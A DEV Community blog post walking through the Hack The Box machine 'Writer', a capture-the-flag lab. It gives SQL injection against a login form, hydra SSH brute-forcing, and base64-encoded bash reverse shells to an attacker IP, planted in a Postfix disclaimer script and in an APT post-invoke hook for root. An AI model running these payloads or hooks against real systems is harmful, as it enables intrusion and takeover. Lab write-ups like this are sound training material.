DEV Community

Cover image for Let's Hack this Box - Writer (Writeup)
Berkcan Uçan
Berkcan Uçan

Posted on

Let's Hack this Box - Writer (Writeup)

Hello guys! This is my first post here. I am planning to post Hack the Box writeups, Web Dev logs and also my Kaggle journeys. Today I am going to work on Writer.

Before start, please try to pawn this machine by yourself first.

"Writer" is rated as Medium difficulty (Linux) machine, we'll see how it goes! I usually start with nmap to see what's going on.

  • nmap is a must have tool to find open ports, services, which OS host uses etc.

nmap scan

alcadramin@archlinux ➜ ~  sudo nmap -sC -sV -sS -A
Enter fullscreen mode Exit fullscreen mode
Starting Nmap 7.92 ( ) at 2021-12-03 07:00 +03
Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 07:00 (0:00:00 remaining)
Nmap scan report for
Host is up (0.075s latency).
Not shown: 996 closed tcp ports (reset)
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
|   256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_  256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 15m52s
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-03T04:16:28
|_  start_date: N/A

TRACEROUTE (using port 3306/tcp)
1   73.43 ms
2   73.95 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 27.84 seconds
Enter fullscreen mode Exit fullscreen mode

We can clearly see that we've a HTTP server let's check what's inside 👀.

Writer Website

Finding URI's with gobuster

Nothing interesting, let's find URI's (directories) with gobuster, which usually leads us to some goodies.

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).
  • Virtual Host names on target web servers.
  • Open Amazon S3 buckets
alcadramin@archlinux ➜ wordlists  gobuster dir -u -w directory-list-2.3-small.txt 
Enter fullscreen mode Exit fullscreen mode
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/12/03 07:22:14 Starting gobuster in directory enumeration mode
/contact              (Status: 200) [Size: 4905]
/about                (Status: 200) [Size: 3522]
/static               (Status: 301) [Size: 313] [-->]
/logout               (Status: 302) [Size: 208] [-->]       
/dashboard            (Status: 302) [Size: 208] [-->]       
/administrative       (Status: 200) [Size: 1443]                                 

2021/12/03 07:33:27 Finished
Enter fullscreen mode Exit fullscreen mode

administrative seem's interesting.

Administrative Page

We've a good old login form, we can check if it's vulnerable to SQL injections, request capturing etc. Let's take a look with Burp Suite!


SQL Injection

Hmm, I've tried weak passwords etc. nothing works, let's try with UNION which is a common SQL vulnerability.

Burp SQL Query

Yay! 🎉 It is vulnerable to SQL injections. I'm just gonna try this request with sqlmap as well. PS: Just copy the request from Burp and save it to a file then pass it to sqlmap with -r.

alcadramin@archlinux ➜ Writer  sqlmap -r request 
Enter fullscreen mode Exit fullscreen mode


Yep it's very clear now, let's continue with Burp.

Burp Injection Success

Burp Injection Success Page Render

We're in. I am going to login with admin' ;**^ query. I've checked dashboard and found we can try to upload image and try to get shell however since we can SQL inject, I'm gonna find users and try to brute-force ssh.


So I've just quickly writed down an injection (you can see the original one in sqlmap screenshot) to get /etc/passwd.

Burp Injection passwd

We can see our users!

Burp Injection passwd 2

SSH Brute-force

We've kyle and john, let's try to brute-force kayle with hydra. (I've tried john as well and waited long time couldn't crack it, so gonna continue with kyle)

kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
Enter fullscreen mode Exit fullscreen mode
salcadramin@archlinux ➜ Writer  sudo hydra -l kyle -P ~/pwn/wordlists/rockyou.txt ssh:// -VV -f -t 60
Enter fullscreen mode Exit fullscreen mode

Not so long after, we've found their password!


And let's connect with ssh! (Someone was already here)

shell 1

Let's check the ports see if we can find something vulnerable.


We can get our user hash now, unfortunately kyle doesn't have sudo access so we'll try to reverse shell to john with SMTP. (No suprise 👀)

After some research I've come accross with this repository, which basically allows you to remap ports to desired one :

I'm going to compile it and upload to kyle with sftp.

alcadramin@archlinux ➜ ~  sftp kyle@
kyle@'s password: 
Connected to
sftp> put /home/alcadramin/pwn/natbypass
Enter fullscreen mode Exit fullscreen mode

Generate the reverse shell payload with base64.

alcadramin@archlinux ➜ ~  echo -n '/bin/bash -c "/bin/bash -i >& /dev/tcp/ 0>&1"' | base64
Enter fullscreen mode Exit fullscreen mode

Let's run the tool and bind it to a random IP.


Now we'll add our payload to /etc/postfix/disclaimer and listen through ncat.


echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0Lzc2NzggMD4mMSI= | base64 -d | bash
Enter fullscreen mode Exit fullscreen mode

Now that they're done, I'm gonna write a script with Ruby to send an email and execute the payload.

#!/usr/bin/env ruby

require 'net/smtp'
require 'openssl'

message = <<MESSAGE_END
Hey John, give me your shell pls.

Net::SMTP.start('', 3137) do |smtp|
  smtp.send_message message, 'kyle@', 'john@'
Enter fullscreen mode Exit fullscreen mode

Hey we're in John now. I've quickly realise there is a private ssh key, so I can use that to connect with ssh!

nc capture

ssh key

We can check John's groups.

john@writer:~$ id
uid=1001(john) gid=1001(john) groups=1001(john),1003(management)
Enter fullscreen mode Exit fullscreen mode

I am just gonna upload pspy64 to John via sftp and check running processes.

alcadramin@archlinux ➜ Writer  sftp -i john_key john@
Connected to
sftp> put /home/alcadramin/pwn/pspy64
Enter fullscreen mode Exit fullscreen mode

Privilege Escalation

So I ran pspy64 and realise this naughty boy is running APT via cron and we also have access to APT hooks so we can create a payload in /etc/apt/apt.conf.d. (

2021/12/03 18:08:02 CMD: UID=0    PID=27301  | /usr/bin/apt-get update 
2021/12/03 18:09:01 CMD: UID=0    PID=27326  | /usr/sbin/CRON -f 
Enter fullscreen mode Exit fullscreen mode
echo 'APT::Update::Post-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0LzEyMTIgMD4mMSI= | base64 -d | bash"};'> 01payload
Enter fullscreen mode Exit fullscreen mode

And we got root access!


Finally I'm submitting my hashes!


  • Thank you for reading this article, hope you've had fun and learned something! See you next time!

Top comments (0)